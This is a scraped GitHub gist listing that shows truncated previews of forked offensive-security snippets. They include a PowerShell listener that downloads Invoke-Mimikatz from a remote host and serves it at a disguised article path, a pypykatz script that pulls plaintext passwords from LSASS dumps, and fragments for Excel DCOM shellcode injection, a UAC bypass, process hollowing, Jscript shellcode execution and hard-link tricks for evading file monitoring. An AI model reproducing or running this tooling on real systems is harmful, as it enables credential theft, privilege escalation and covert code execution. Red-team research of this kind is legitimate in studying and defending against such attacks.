Skip to content

Instantly share code, notes, and snippets.

View TheWover's full-sized avatar

TheWover

1.2k followers · 49 following
View GitHub Profile
@TheWover
TheWover / server.ps1
Created December 18, 2019 21:41 — forked from cobbr/server.ps1
Dirty PowerShell Webserver
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
@TheWover
TheWover / Invoke-Excel4DCOM64.ps1
Created December 14, 2019 14:45 — forked from Philts/Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
@TheWover
TheWover / powershell-uac-always-notify-bypass.ps1
Created December 4, 2019 19:25 — forked from chryzsh/powershell-uac-always-notify-bypass.ps1
uac bypass for always notify (works on 1903)
$assemblies=(
"System"
)
$source=@"
using System;
using Microsoft.Win32;
using System.Diagnostics;
namespace Helloworld
@TheWover
TheWover / mscorlib_load_assembly.vba
Created September 30, 2019 19:58 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@TheWover
TheWover / shellcode.js
Created September 26, 2019 17:46 — forked from Ridter/shellcode.js
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
@TheWover
TheWover / mymykat.sh
Created September 20, 2019 14:35 — forked from seajaysec/mymykat.sh
super rough plaintext secret parser for pypykatz dumps
#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir
ext='.dmp'
for i in *$ext; do
txtfile=${i::-3}txt
secrets=${i::-3}secrets
pypykatz lsa minidump $i -o $txtfile;
grep 'password' $txtfile -B 2 | grep -v 'None' | grep 'password' -B 1 | sed -e "s#--##g" | sed '/^$/d' | sed '$!N;s/\n/ /' | sed 's/username //g' | sed 's/password /::/g' | tr -d '[:blank:]' | sort -u > $secrets
@TheWover
TheWover / Update_Notes.md
Created August 5, 2019 13:14
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@TheWover
TheWover / Hollowing.cs
Created July 26, 2019 20:25 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <[email protected]>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@TheWover
TheWover / ReadingPortableExecutable_PE_header.cs
Created July 21, 2019 20:05 — forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C#
// Credits: John Stewien
// From: http://code.cheesydesign.com/?p=572
/*
Reading the Portable Executable (PE) header in C#
My job consists of writing fully custom applications for groups of people. The time pressure of these projects is quite high, so generally people start using the application while I’m still writing it, which means I write it modularly and add features as I go along. I also fix bugs as they are discovered. My clients are 2 tiered where expert users get a new build first, they test if for a while, and if they think it’s acceptable they then pass it on to others.
This method of distribution is quite ad-hoc so when a client rings me up and asks me to view their screen to look at something, it’s useful to know what build they are running. To facillitate this I print the link date in the main Window Title so I instantly have an idea about how old the version is that I am looking at. This date is calculated at run time. To do this requires reading in the Portable Executable (PE) header from th
@TheWover
TheWover / Invoke-ExShellcode.ps1
Created July 9, 2019 16:30 — forked from Philts/Invoke-ExShellcode.ps1
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#